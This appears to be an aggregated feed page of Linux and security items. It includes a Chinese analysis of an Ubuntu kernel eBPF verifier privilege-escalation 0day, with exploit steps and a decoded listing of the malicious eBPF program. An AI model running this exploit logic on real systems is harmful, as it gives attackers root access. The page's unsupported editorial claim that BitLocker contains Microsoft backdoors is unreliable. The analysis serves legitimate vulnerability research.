          Security: HardenedBSD, BitLocker, Updates, Google Play, Ubuntu and Reproducible Builds      Cache   Translate Page      
  • Stable release: HardenedBSD-stable 11-STABLE v1100056.8
  • Your Data Might Be At Risk Even In Encrypted Drives, Researchers Find Major Vulnerabilities In Hardware Encryption Present In Some SSDs [Ed: BitLocker is fake encryption. Microsoft put back doors in it.]

    Talking about software, BitLocker is a full-disk encryption software offered by Windows. Although the researchers show its very unreliable. It uses the hardware encryption present on the drives by default, thus the vulnerabilities remain. The researchers state “BitLocker, the encryption software built into Microsoft Windows, can make this kind of switch to hardware encryption but offers the affected disks no effective protection in these cases. Software encryption built into other operating systems (such as macOS, iOS, Android, and Linux) seems to be unaffected if it does not perform this switch.” This can be fixed by forcing software encryption on BitLocker.

  • Security updates for Tuesday
  • Banking Trojans sneaked into Google Play store disguised as apps

    Malware authors keep testing the vigilance of Android users by sneaking disguised mobile banking Trojans into the Google Play store. We’ve recently analyzed a set of 29 such stealthy Trojans, found in the official Android store from August until early October 2018, masquerading as device boosters and cleaners, battery managers and even horoscope-themed apps.

  • These Apps On Google Play Store Can Steal Your Bank Details
  • How Ubuntu is at the forefront of security & compliance

    Whether it is HIPAA, MiFID II or GDPR, the importance of being compliant cannot be underestimated. Protecting your customers and avoiding the significant financial and reputational ramifications that threaten non-compliant organisations, is a must, and this starts with the technology powering your enterprise.

    Ubuntu is used by businesses spanning all sizes, industries and geographies, and at the foundation of the relationship between Ubuntu and its users is trust and the assurance that Ubuntu will provide a compliant platform upon which to conduct business.

    Canonical, the company behind Ubuntu, provides businesses with compliance-enabling technologies. The Landscape management tool can help ensure the latest patches are in place, avoiding negligence in complying with GDPR data standards.

  • Reproducible Builds: Weekly report #184

read more


          Red Hat Security Advisory 2018-3459-01      Cache   Translate Page      
Red Hat Security Advisory 2018-3459-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a denial of service vulnerability.
          Opera 56.0.3051.99      Cache   Translate Page      

Opera 56.0.3051.99 — популярний безкоштовний браузер, що надає багато зручних інструментів для навігації в Інтернеті.

  • Захоплення робочого столу не працює належним чином.
  • Неможливо побачити повний текст ліцензії на оперу // про / кредити.
  • «Linux» Немає роздільник вкладок.
  • Помилка в - «ZoomButton setAddressBarModel».
  • Панель інструментів купона.

          #Mix08 evenings are pretty cool      Cache   Translate Page      

Originally posted on: http://blog.freestylecoding.com/lbugnion/archive/2008/03/07/mix08-session-exploring-moonlight-novells-implementation-of-silverlight-on-linux.aspx

So last night was the last evening for many (but not for me since I am flying only tomorrow, ha ha), and there was a number of dinners and parties going on. I was lucky to be invited to a great dinner at Zeffirino's thrown by IdentityMine. These dinners are always wonderful occasions to meet and talk to the big players in the field of WPF and Silverlight, designers and developers mixed. Yesterday was not an exception to that rule, with Scott Guthrie, Miguel Icaza (of Moonlight and Mono), Grant Hinkson of Infragistics, Rob Relyea, Karsten Januzsewski (can't believe that I missed you, so sorry about that!), Ryan Stewart of Adobe, and many others that I was really pleased to meet.


Read the rest of this entry »


          Xavier Claessens: Speed up your GitLab CI      Cache   Translate Page      

GNOME GitLab has AWS runners, but they are used only when pushing code into a GNOME upstream repository, not when you push into your personal fork. For personal forks there is only one (AFAIK) shared runner and you could be waiting for hours before it picks your job.

But did you know you can register your own PC, or a spare laptop collecting dust in a drawer, to get instant continuous integration (CI) going? It’s really easy to setup!

1. Install docker

apt install docker.io

2. Install gitlab-runner

Follow the instructions here:
https://gitlab.com/gitlab-org/gitlab-runner/blob/master/docs/install/linux-repository.md#installing-the-runner

(Note: The Ubuntu 18.04 package doesn’t seem to work.)

3. Install & start the GitLab runner service

sudo gitlab-runner install
sudo gitlab-runner start

4. Find the registration token

Go to your gitlab project page, settings -> CI/CD -> expand “runners”

5. Register your runner

sudo gitlab-runner register --non-interactive --url https://gitlab.gnome.org --executor docker --docker-image fedora:27 --registration-token **

You can repeat step 5 with the registration token of all your personal forks in the same GitLab instance. To make this easier, here’s a snippet I wrote in my ~/.bashrc to register my “builder.local” machine on a new project. Use it as gitlab-register .

function gitlab-register {
  host=$1
  token=$2

  case "$host" in
    gnome)
      host=https://gitlab.gnome.org
      ;;
    fdo)
      host=https://gitlab.freedesktop.org
      ;;
    collabora)
      host=https://gitlab.collabora.com
      ;;
    *)
      host=https://gitlab.gnome.org
      token=$1
  esac

  cmd="sudo gitlab-runner register --non-interactive --url $host --executor docker --docker-image fedora:27 --registration-token $token"

  #$cmd

  ssh builder.local -t "$cmd"
}

Not only will you now get faster CI, but you’ll also reduce the queue on the shared runner for others!


          Ghostscript Update for Arch Linux      Cache   Translate Page      
A ghostscript security update is available for Arch Linux...
          Curl Updates for Debian      Cache   Translate Page      
Updated curl packages has been released for Debian GNU/Linux: Debian GNU/Linux 7 Extended LTS: ELA-54-1 curl security update Debian GNU/Linux 8 LTS: DLA 1568-1: curl security update ...
          Extreme Networks Launches Agile Data Center Networking Products (Linux-Powered!)      Cache   Translate Page      

EnterpriseNetworkingPlanet: Extreme Networks details its new Agile Data Center Networking strategy which integrates automation, visibility, software and hardware elements.


          CPod: An Open Source Podcast App for Linux      Cache   Translate Page      

itsFOSS: CPod is an open source podcast application for Linux, Windows and MacOS.


          Asp .Net Core Development Company      Cache   Translate Page      

The ASP.NET Framework is one of the leading frameworks for developing applications, but it only permits developers to build applications for Windows. Now as one of the top .net core framework development agency, we can help you develop applications for Windows, Mac, and Linux using the same code using open source .net core framework supported […]

The post Asp .Net Core Development Company appeared first on .


           340亿元收购红帽是IBM在云计算领域最后的救命稻草       Cache   Translate Page      

340 亿美元收购开源软件商红帽 RedHat 是 IBM 这家百年老店 107 年历史上最大的一笔收购,也是有史以来规模最大的一笔软件领域的交易。IBM 这个如同赌博一样的收购除了令人咂舌的价格之外,并不会让业界觉得意外,因为这项收购对于红帽来说,自己可以从容选择一家更适合自己的伙伴,而红帽可能是 IBM 在云计算领域最后的救命稻草了。

据外媒获得的线报,IBM 对红帽的收购相当有诚意。

实际上,不仅仅是 IBM,其它诸如甲骨文、思科等没有跟上云计算时代脚步的传统 IT 公司,以及在云计算领域艰难竞争的新兴科技公司 (比如 Google),都曾有意收购红帽,而这一批「符合逻辑」硅谷公司在过去几年已经和红帽开始接触并举行了初步谈判,但红帽最终意外也选择了 IBM,其它竞争对手相比,IBM 的出价并不是最高的,但红帽 CEO 吉姆·怀特赫斯特 (Jim Whitehurst) 对媒体表示没有一家公司的谈判态度能和 IBM 相比。

据悉让红帽打动的是 IBM 是一个安全的买家,IBM 承诺红帽公司未来将继续在 IBM 内部独立运营,并且不会收到新的母公司的干扰,而且也不会明显改变现阶段的竞争格局。在云计算上花费 340 亿美元并不能使 IBM 一举超过亚马逊成为举足轻重的云计算巨头,也不能像 Salesforce 或者 Twilio 那样成为该领域颇具新鲜感的未来力量。IBM 收购红帽有自己的逻辑。

最直接的是收购红帽将可能改善 IBM 长期以来一直处于低迷的财务状况。IBM 在过去六年一直处于营收下滑的状态,虽然在之前连续三个季度有势头不错的增长让外界看到复兴的希望,但在前几天 IBM 公布的 2018 年第三季度财报显示营收再度下滑,当季营收 188 亿美元,不及华尔街预期的 191 亿美元,再加上美股持续暴跌,IBM 的股价也非常凄惨。

实际上,红帽的营收规模和 IBM 相比并不大,但增长速度惊人,并在此过程中产生现金流,而且重要的是红帽可以带给百年巨人「新的故事」可以讲,可以向华尔街证明自己有转型的决心来换取投资人重获信心。

#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

实际上,最近一年红帽本身的业绩也颇有压力,在上个财季红帽的销售成绩低于分析师预期,而且净利润下滑速度也很明显,而且预测本季度也将出现下滑,让外界质疑红帽的增长前景和获得合同的能力。尽管该公司对外界表示公司的营收将「触底反弹」,全年营收也铁定超过 30 亿美元,但其股价在过去的六个月里下跌了 28%,红帽需要做出一些调整。

#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

在更坏的结果出现之前,双方的合并可能是一个更好的选择。双方合并后 IBM 将给红帽提供更大的客户群,吉姆·怀特赫斯特表示「与 IBM 合作将为红帽提供更高水平的规模、资源和能力,并将为 Red Hat 带来更广泛的客户群。」华尔街分析师预计合并后 IBM 今年将出现微弱的增长,在 2019 年可能到来的经济再次萎缩之前,本财年和下财年,IBM 至少将增长 15%。IBM 预计双方合并后的营收将增长 2%,每股收益(不包括某些项目)将在两年后实现增长。

混合云的竞争可能是个拐点

收购完成后,Red Hat 将被并入 IBM 的混合云部门。就纯公有云而言,亚马逊、微软、Google 已经占据了绝对的市场份额,IBM 没有任何机会,而混合云则是 IBM 重新切回云计算主赛道的希望。

红帽的传统业务是围绕 Linux 开源操作系统做生意。IBM 虽然也有一个与亚马逊和微软竞争的公有云产品,但开发人员在许多公共云上更广泛使用红帽的 Linux 操作系统,包括微软 Azure 和 Google Cloud。尽管越来越多的公司选择使用了 IBM 公有云业务的主要竞争对手,但这种多云方式应该有助于 IBM 带来收入。

IBM 公司董事长,总裁兼首席执行官 Ginni Rometty 表示购买 Red Hat 将帮助公司成为混合云市场的领导者,「是一个改变云市场游戏规则的方式。」「IBM 将成为全球排名第一的混合云提供商,为企业提供唯一的公有云的解决方案。」

众所周知,混合云是现在最受欢迎的上云方式,一些大企业或者组织更愿意选择这种方式来确保公司的核心数据不被外泄,尽管云计算公司多次郑重强调企业的数据在云上绝对安全,而且越来越多的企业组织将尝试采用多云方法,他们喜欢利用来自不同云计算提供商 (如亚马逊和微软Azure) 的云服务组合。

#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

IDC 预测,未来混合云将占据整个云市场份额的 67%。Gartner 预测,到 2020 年,90%的组织将利用混合云管理基础设施。而根据 MarketsandMarkets 的调查,到 2021 年,混合云市场规模预计将增长到 917.4 亿美元。

业界预计混合云解决方案的强劲发展势头将会加强企业对多云的采用。企业采用公共云用来补充现有的本地部署数据中心和私有云基础架构的不足。

Ginni Rometty 表示如今大多数公司与云计算相关的业务只有 20%,它们利用上云来削减成本。然而接下来的 80% 将会是云计算的下一章,它们会通过云计算来释放更多的实际业务并推动增长,需要将自己的业务迁移到混合云,并通过数据计算来优化企业业务的各个部分。

另外,Rometty 说,购买红帽意味着要让 800 多万软件开发人员参与进来,这可能会让他们更接近 IBM 的其他产品。还有机会为 IBM 提供更多的咨询服务。根据野村证券的报告,帮助部署红帽产品 (如 JBoss 中间件和 OpenShift 软件以在虚拟容器中部署应用程序) 可能都将归属于 IBM 的咨询和托管服务业务。

341亿美元的乌云?

这笔交易可能会帮助销售传统数据中心硬件的 IBM 改善其在仍在自己设备上运行应用程序的公司中的定位。

电池风投的合伙人 Dharmesh Thakker 在接受媒体采访时表示,撇开对公共云计算的支出不谈,「剩下的 90% 的数据中心支出仍在惠普、IBM、戴尔和思科上。」「IBM 希望通过将一项关键资产作为混合资产的一部分,他们能把自己描绘成这群人中最好的。」

在最新的一笔巨额交易中,IBM 面临着很大的风险。许多大型科技 IT 科技收购都以失败告终,尤其是惠普 (Hewlett-Packard) 以 250 亿美元收购康柏 (Compaq),微软以 72 亿美元收购诺基亚 (Nokia) 的设备和服务业务,以及 Google 以 125 亿美元收购摩托罗拉移动 (Motorola Mobility)。

正如坎托·菲茨杰拉德 (Cantor Fitzgerald) 分析师周一在一份报告中所写,「这笔交易能否成功,将取决于它在交叉销售/整合方面的执行情况。」

尽管目前并没有一份公认的混合云市场份额报告,但业界普遍认为如果公有云市场当前的情形,亚马逊和微软占据了绝对主力的地位。而且混合云虽然是当前的热门产业,但已经有众多竞争对手涌入这个行业,IBM 现在几乎没有任何先入为主的优势,只能依靠双方优势资源的技术整合和销售人员巧舌如簧的技巧来获取更多的客户。

#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

我们也不得不怀疑 IBM 在未来混合云方面的策略是否会进一步重蹈 Watson 项目的覆辙。IBM 公司自 2006 年开始研发Watson,不久 Watson 就已经成为了 IBM 的核心方向,但随着时间的推移,与 Watson 相关的不是技术进展而是各种负面。

但有业界人士直言 IBM 的 Watson 实际上是个「咨询业务」。在该业务的开展过程中,IBM 与企业客户签订高价合同,将 Watson 技术应用于特定业务场景。然而不幸的是,IBM 很难让该公司的技术真正的满足客户需求。这导致了 Watson 进一步失去信心,最具代表性的事件就是「股神」沃伦·巴菲特表示对 IBM 业务失去信心,并对外界表示已经抛售了其持有约三分之一的 IBM 股票,随之而来的 IBM 的营业额和股价的暴跌。

和红帽的整合无疑让 IBM 在混合云方面更具有竞争水平,但 IBM 需要用更成功的案例去证明自己可以为用户带来符合其付出巨额合同所带来的价值,从而进一步赢得市场的信心。纳德拉在 2018 年第二季度分析师电话会议上表示,当微软云用户在使用的过程中表示满意,他们同样会选择微软混合云产品,这似乎也是一件很自然的事情。但是又有多少用户会表示红帽操作系统很好用,就会去选择 IBM 的混合云业务呢?这两者之间的差距看起来似乎有些大。

如果这项 340 亿美元的交易整合失败,IBM 这家百年老店未来会怎样?

*本文作者Chaos


          UNIX ENGINEER III - OneNeck IT Solutions - Madison, WI      Cache   Translate Page      
Professional level or higher certification in (Linux, Oracle Virtual Machine (OVM), HP-UX) preferred. Technology experience in (MS-SQL, Oracle, Informix, or...
From OneNeck IT Solutions - Tue, 06 Nov 2018 00:54:48 GMT - View all Madison, WI jobs
          Amazon Linux: supporto Java fino al 2023      Cache   Translate Page      

Amazon estende il supporto gratuito alle versioni di OpenJDK che Oracle dismetterà entro il 2020.

Leggi Amazon Linux: supporto Java fino al 2023


          SR MGR CRM DATA MANAGEMENT - The Home Depot - Vancouver, WA      Cache   Translate Page      
Oracle, DB2, SQL Server, Sybase, Shell (C, Korn, Bourne, KSH), AUP, OLTP, Linux, UNIX, AIX, Solaris, T-SQL, PL/SQL, SSIS, SSAS, SSRS, RAID, SAN, DTS, ETL, RMAN,...
From The Home Depot - Thu, 23 Aug 2018 18:24:11 GMT - View all Vancouver, WA jobs
          Extreme Networks Launches Agile Data Center Networking Products (Linux-Powered!)      Cache   Translate Page      

EnterpriseNetworkingPlanet: Extreme Networks details its new Agile Data Center Networking strategy which integrates automation, visibility, software and hardware elements.


          Comment on Of course you can boot Linux on new Macs – here’s how by Microsoft's funeral      Cache   Translate Page      
Where there's a will, there's a funeral
          Hidden Costs of IoT Vulnerabilities      Cache   Translate Page      

IoT devices have become part of our work and personal lives. Unfortunately, building security into these devices was largely an afterthought.

Another day, another hack. Whether it's a baby monitor used to spy on mother and child, or anFBI warning to reset home wireless routers due to Russian intrusion, the question continues to be: What's next?

Internet of Things (IoT) devices are part of both our work and personal lives. Unfortunately, building security into these devices was largely an afterthought ― the ramifications of which we are now seeing on a near-daily basis. However, let's look beyond the headlines at the hidden costs of IoT security vulnerabilities. These fall into five categories: device security, intellectual property (IP) protection, brand protection, operational cost containment, and user experience.

Device Security

Once hacked, some devices can do a disproportionate amount of physical damage. It all depends on the degree of criticality to the nation-state, community, or individual.

The agriculture industry, for example, is as valuable to a country as any other strategic asset, such as utilities, finance, or communications. Many big farms today are automated via field sensors and autonomous vehicles. Let's imagine that someone hacks the sensors to erroneously indicate that the corn is ready to be cut, even though it's three months too early. Or that a hack signals an autonomous tractor to spread too much fertilizer, burning and causing the loss of an entire crop. This potentially catastrophic hack, as well as the corresponding financial losses or risk to the nation-state and its citizens, seem endless.

It is highly recommended that you closely examine the security of your IoT devices via the lens of worst-case scenarios. Ensuring the integrity of the data coming from your remote sensors is especially important because this data drives automated decisions with long-term implications.

IP Protection

It's astounding how many organizations will spend millions of dollars on R&D and then put that valuable intellectual property on an insecure IoT device. In this case, a hack could mean the end of your business.

Now, let's presume that you are investing heavily in building sophisticated algorithms to enable machine learning, artificial intelligence, or facial recognition. As you look to deploy these proprietary algorithms for use in an IoT device, you are ultimately left with two choices: 1) Protect the algorithm in the cloud, forcing the IoT device to run back-and-forth to run the process and adversely affecting the customer experience, or 2) install the algorithm into the OS stack on the IoT device and risk a hack that steals your algorithm ― essentially making you toss your entire R&D investment into the wastebasket.

Brand Protection

Apathy and inertia are creating a sense of "hack numbness," though the consequence of turning a blind eye depends on where you sit.

Let's say you make devices that help protect or enhance the life of children, with cameras or microphones that are always on and always watching. Consider a hack on these devices, and the misuse of the information they have access to, now being consumed by unsavory characters.

This is a brand killer. No matter how noble your IoT device and its application, if you cannot protect children, the market will make sure your future is cut short.

Consequently, security can't be ignored because you became numb to attacks. This is especially true if you're in a business that requires your IoT devices to gather sensitive information. Couple this with an emotionally invested customer base, such as users of child-monitoring devices, and a hack will mean the end of your business.

Operational Cost Containment

Satellite time is expensive. Within the broadest construct of the many new IoT devices, some will have a component that relies on satellites for data communication. It does not need to be said (but I'll say it anyway) that satellite time is a very expensive path for data backhaul.

Imagine a hack where a botnet starts a distributed denial-of-service attack on a music-streaming server, which then causes the IoT device to start rapidly and overwhelmingly pinging the music streaming service. As the IoT device is battery powered and using satellite for its backhaul, every ping now statistically shorts the life of the IoT device.

This scenario serves as a double whammy of cost containment. If you're leveraging satellites in your IoT strategy, you must examine where potential vulnerabilities are because they could affect your overall costs of operation and maintenance.

User Experience

As the saying goes, everyone has been hacked, but there are some who don't know it yet. While there may be no disruption of service at the time of a hack, what happens when there is some type of glitch?

Let's imagine that you get up one morning and ask Alexa to open the blinds, but they don't open. Now you have to check if there's Internet service into the house, and then confirm that the Wi-Fi network is broadcasting and that Alexa is enabled properly, and, finally, you have to ensure that the app for "my blinds" is connected and working. Considering how much time this could take, it would be quicker to get out of bed and just open the blinds manually.

Consequently, adding a path to ensure that the original code base is not corrupted through attestation, we can minimize the impact on the user with a highly secure device update, but the hidden cost is the impact on their time.

Conclusion

The world is catching on to the idea that IoT device security is of paramount importance. Frankly, if end users were affected in a meaningful way (say, something involving their TVs) through one significant hack, the demand for security would become "top of mind." The question is how many of these hidden costs will affect organizations while we work toward a more secure ecosystem.

In my opinion, embedding security in the IoT ecosystem can't come soon enough.

Related Content: 7 Serious IoT Vulnerabilities IoT Bot Landscape Expands, Attacks Vary by Country New Report: IoT Now Top Internet Attack Target A Cybersecurity Weak Link: linux and IoT
Hidden Costs of IoT Vulnerabilities

Black Hat Europe returns to London Dec. 3-6, 2018, with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Carl Nerup's experience is a powerful mix of proven marketing and sales leadership an
          四两拨千斤:Ubuntu kernel eBPF 0day分析      Cache   Translate Page      

中国武术博大精深,其中太极作为不以拙力胜人的功夫备受推崇。同样如果从攻击的角度窥视漏洞领域,也不难看出攻防之间的博弈不乏“太极”的身影,轻巧稳定易利用的漏洞与工具往往更吸引黑客,今天笔者要着墨分析的就是这样一个擅长“四两拨千斤”的0day漏洞。

0day漏洞的攻击威力想必大家都听说过,内核0day更因为其影响范围广,修复周期长而备受攻击者的青睐。近期,国外安全研究者Vitaly Nikolenko在twitter[1]上公布了一个Ubuntu 16.04的内核0day利用代码[2],攻击者可以无门槛的直接利用该代码拿到Ubuntu的最高权限(root);虽然只影响特定版本,但鉴于Ubuntu在全球拥有大量用户,尤其是公有云用户,所以该漏洞对企业和个人用户还是有不小的风险。

笔者对该漏洞进行了技术分析,不管从漏洞原因还是利用技术看,都相当有代表性,是Data-Oriented Attacks在linux内核上的一个典型应用。仅利用传入的精心构造的数据即可控制程序流程,达到攻击目的,完全绕过现有的一些内存防护措施,有着“四两拨千斤”的效果 。

0×02 漏洞原因

这个漏洞存在于Linux内核的eBPF模块,我们先来简单了解下eBPF。

eBPF(extended Berkeley Packet Filter)是内核源自于BPF的一套包过滤机制,严格来说,eBPF的功能已经不仅仅局限于网络包过滤,利用它可以实现kernel tracing,tracfic control,应用性能监控等强大功能。为了实现如此强大的功能,eBPF提供了一套类RISC指令集,并实现了该指令集的虚拟机,使用者通过内核API向eBPF提交指令代码来完成特定的功能。

看到这里,有经验的安全研究者可能会想到,能向内核提交可控的指令代码去执行,很可能会带来安全问题。事实也确实如此,历史上BPF存在大量漏洞 [3]。关于eBPF的更多细节,可以参考这里[4][5]。

eBPF在设计时当然也考虑了安全问题,它在内核中实现了一套verifier机制,过滤不合规的eBPF代码。然而这次的漏洞就出在eBPF的verifier机制。

从最初Vitaly Nikolenko公布的补丁截图,我们初步判断该漏洞很有可能和CVE-2017-16995是同一个漏洞洞[6],但随后有2个疑问: 1.CVE-2017-16995在去年12月份,内核4.9和4.14及后续版本已经修复,为何Ubuntu使用的4.4版本没有修复? 2.CVE-2017-16995是Google Project Zero团队的Jann Horn发现的eBPF漏洞,存在于内核4.9和4.14版本[7],作者在漏洞报告中对漏洞原因只有简短的描述,跟本次的漏洞是否完全相同? 注:笔者所有的代码分析及调试均基于Ubuntu 14.04,内核版本为4.4.0-31-generic #50~14.04.1-Ubuntu[8]。

先来回答第二个问题,中间的调试分析过程在此不表。

参考以下代码,eBPF的verifer代码(kernel/bpf/verifier.c)中会对ALU指令进行检查(check_alu_op),该段代码最后一个else分支检查的指令是:

1.BPF_ALU64|BPF_MOV|BPF_K,把64位立即数赋值给目的寄存器; 2.BPF_ALU|BPF_MOV|BPF_K,把32位立即数赋值给目的寄存器;

但这里并没有对2条指令进行区分,直接把用户指令中的立即数insn->imm赋值给了目的寄存器,insn->imm和目的寄存器的类型是integer,这个操作会有什么影响呢?


四两拨千斤:Ubuntu kernel eBPF 0day分析
我们再来看下,eBPF运行时代码(kernel/bpf/core.c),对这2条指令的解释是怎样的(bpf_prog_run)。 参考以下代码,上面2条ALU指令分别对应ALU_MOV_K和ALU64_MOV_K,可以看出verifier和eBPF运行时代码对于2条指令的语义解释并不一样,DST是64bit寄存器,因此ALU_MOV_K得到的是一个32bit unsigned integer,而ALU64_MOV_K会对imm进行sign extension,得到一个signed 64bit integer。
四两拨千斤:Ubuntu kernel eBPF 0day分析
至此,我们大概知道漏洞的原因,这个逻辑与CVE-2017-16995基本一致,虽然代码细节上有些不同(内核4.9和4.14对verifier进行了较大调整)。但这里的语义不一致又会造成什么影响? 我们再来看下vefier中以下代码(check_cond_jmp_op),这段代码是对BPF_JMP|BPF_JNE|BPF_IMM指令进行检查,这条指令的语义是:如果目的寄存器立即数==指令的立即数(insn->imm),程序继续执行,否则执行pc+off处的指令;注意判断立即数相等的条件,因为前面ALU指令对32bit和64bit integer不加区分,不论imm是否有符号,在这里都是相等的。
四两拨千斤:Ubuntu kernel eBPF 0day分析
再看下eBPF运行时对BPF_JMP|BPF_JNE|BPF_IMM指令的解释(bpf_prog_run),显然当imm为有符合和无符号时,因为sign extension,DST!=IMM结果是不一样的。
四两拨千斤:Ubuntu kernel eBPF 0day分析
注意这是条跳转指令,这里的语义不一致后果就比较直观了,相当于我们可以通过ALU指令的立即数,控制跳转指令的逻辑。这个想象空间就比较大了,也是后面漏洞利用的基础,比如可以控制eBPF程序完全绕过verifier机制的检查,直接在运行时执行恶意代码。

值得一提的是,虽然这个漏洞的原因和CVE-2017-16995基本一样,但但控制跳转指令的思路和CVE-2017-16995中Jann Horn给的POC思路并不一样。感兴趣的读者可以分析下,CVE-2017-16995中POC,因为ALU sign extension的缺陷,导致eBPF中对指针的操作会计算不正确,从而绕过verifier的指针检查,最终读写任意kernel内存。但这种利用方法,在4.4的内核中是行不通的,因为4.4内核的eBPF不允许对指针类型进行ALU运算。

到这里,我们回过头来看下第一个问题,既然漏洞原因一致,为什么Ubuntu 4.4的内核没有修复该漏洞呢?和Linux kernel的开发模式有关。

Linux kernel分mainline,stable,longterm 3种版本[9],一般安全问题都会在mainline中修复,但对于longterm,仅会选择重要的安全补丁进行backport,因此可能会出现,对某个漏洞不重视或判断有误,导致该漏洞仍然存在于longterm版本中,比如本次的4.4 longterm,最初Jann Horn并没有在报告中提到影响4.9以下的版本。 关于Linux kernel对longterm版本的维护,争论由来已久[10],社区主流意见是建议用户使用最新版本。但各个发行版(比如Ubuntu)出于稳定性及开发成本考虑,一般选择longterm版本作为base,自行维护一套kernel。

对于嵌入式系统,这个问题更严重,大量厂商代码导致内核升级的风险及成本都远高于backport安全补丁,因此大部分嵌入式系统至今也都在使用比较老的longterm版本。比如Google Android在去年Pixel /Pixel XL 2发布时,内核版本才从3.18升级到4.4,原因也许是3.18已经进入EOL了(End of Life),也就是社区要宣布3.18进入死亡期了,后续不会在backport安全补丁到3.18,而最新的mainline版本已经到了4.16。笔者去年也在Android kernel中发现了一个未修复的历史漏洞(已报告给google并修复),但upstream在2年前就修复了。

而Vitaly Nikolenko可能是基于CVE-2017-16995的报告,在4.4版本中发现存在类似漏洞,并找到了一个种更通用的利用方法(控制跳转指令)。

0×03 漏洞利用

根据上一节对漏洞原因的分析,我们利用漏洞绕过eBPF verifier机制后,就可以执行任意eBPF支持的指令,当然最直接的就是读写任意内存。漏洞利用步骤如下:

1.构造eBPF指令,利用ALU指令缺陷,绕过eBPF verifier机制;

2.构造eBPF指令,读取内核栈基址;

3.根据泄漏的SP地址,继续构造eBPF指令,读取task_struct地址,进而得到task_struct->cred地址;

4.构造eBPF指令,覆写cred->uid, cred->gid为0,完成提权。

漏洞利用的核心,在于精心构造的恶意eBPF指令,这段指令在Vitaly Nikolenko的exp中是16机制字符串(char *__prog),并不直观,笔者为了方便,写了个小工具,把这些指令还原成比较友好的形式,当然也可以利用eBPF的调试机制,在内核log中打印出eBPF指令的可读形式。我们来看下这段eBPF程序,共41条指令(笔者写的小工具的输出):

parsing eBPF prog, size 328, len 41
ins 0: code(b4) alu | = | imm, dst_reg 9, src_reg 0, off 0, imm ffffffff
ins 1: code(55) jmp | != | imm, dst_reg 9, src_reg 0, off 2, imm ffffffff
ins 2: code(b7) alu64 | = | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 3: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 4: code(18) ld | BPF_IMM | u64, dst_reg 9, src_reg 1, off 0, imm 3
ins 5: code(00) ld | BPF_IMM | u32, dst_reg 0, src_reg 0, off 0, imm 0
ins 6: code(bf) alu64 | = | src_reg, dst_reg 1, src_reg 9, off 0, imm 0
ins 7: code(bf) alu64 | = | src_reg, dst_reg 2, src_reg a, off 0, imm 0
ins 8: code(07) alu64 | += | imm, dst_reg 2, src_reg 0, off 0, imm fffffffc
ins 9: code(62) st | BPF_MEM | u32, dst_reg a, src_reg 0, off fffffffc, imm 0
ins 10: code(85) jmp | call | imm, dst_reg 0, src_reg 0, off 0, imm 1
ins 11: code(55) jmp | != | imm, dst_reg 0, src_reg 0, off 1, imm 0
ins 12: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 13: code(79) ldx | BPF_MEM | u64, dst_reg 6, src_reg 0, off 0, imm 0
ins 14: code(bf) alu64 | = | src_reg, dst_reg 1, src_reg 9, off 0, imm 0
ins 15: code(bf) alu64 | = | src_reg, dst_reg 2, src_reg a, off 0, imm 0
ins 16: code(07) alu64 | += | imm, dst_reg 2, src_reg 0, off 0, imm fffffffc
ins 17: code(62) st | BPF_MEM | u32, dst_reg a, src_reg 0, off fffffffc, imm 1
ins 18: code(85) jmp | call | imm, dst_reg 0, src_reg 0, off 0, imm 1
ins 19: code(55) jmp | != | imm, dst_reg 0, src_reg 0, off 1, imm 0
ins 20: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 21: code(79) ldx | BPF_MEM | u64, dst_reg 7, src_reg 0, off 0, imm 0
ins 22: code(bf) alu64 | = | src_reg, dst_reg 1, src_reg 9, off 0, imm 0
ins 23: code(bf) alu64 | = | src_reg, dst_reg 2, src_reg a, off 0, imm 0
ins 24: code(07) alu64 | += | imm, dst_reg 2, src_reg 0, off 0, imm fffffffc
ins 25: code(62) st | BPF_MEM | u32, dst_reg a, src_reg 0, off fffffffc, imm 2
ins 26: code(85) jmp | call | imm, dst_reg 0, src_reg 0, off 0, imm 1
ins 27: code(55) jmp | != | imm, dst_reg 0, src_reg 0, off 1, imm 0
ins 28: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 29: code(79) ldx | BPF_MEM | u64, dst_reg 8, src_reg 0, off 0, imm 0
ins 30: code(bf) alu64 | = | src_reg, dst_reg 2, src_reg 0, off 0, imm 0
ins 31: code(b7) alu64 | = | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 32: code(55) jmp | != | imm, dst_reg 6, src_reg 0, off 3, imm 0
ins 33: code(79) ldx | BPF_MEM | u64, dst_reg 3, src_reg 7, off 0, imm 0
ins 34: code(7b) stx | BPF_MEM | u64, dst_reg 2, src_reg 3, off 0, imm 0
ins 35: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 36: code(55) jmp | != | imm, dst_reg 6, src_reg 0, off 2, imm 1
ins 37: code(7b) stx | BPF_MEM | u64, dst_reg 2, src_reg a, off 0, imm 0
ins 38: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
ins 39: code(7b) stx | BPF_MEM | u64, dst_reg 7, src_reg 8, off 0, imm 0
ins 40: code(95) jmp | exit | imm, dst_reg 0, src_reg 0, off 0, imm 0
parsed 41 ins, total 41 稍微解释下,ins 0 和 ins 1 一起完成了绕过eBPF verifier机制。ins 0指令后,regs[9] = 0xffffffff,但在verifier中,regs[9].imm = -1,当执行ins 1时,jmp指令判断regs[9] == 0xffffffff,注意regs[9]是64bit integer,因为sign extension,regs[9] == 0xffffffff结果为false,eBPF跳过2(off)条指令,继续往下执行;而在verifier中,jmp指令的regs[9].imm == insn->imm结果为true,程序走另一个分支,会执行ins 3 jmp|exit指令,导致verifier认为程序已结束,不会去检查其余的dead code。

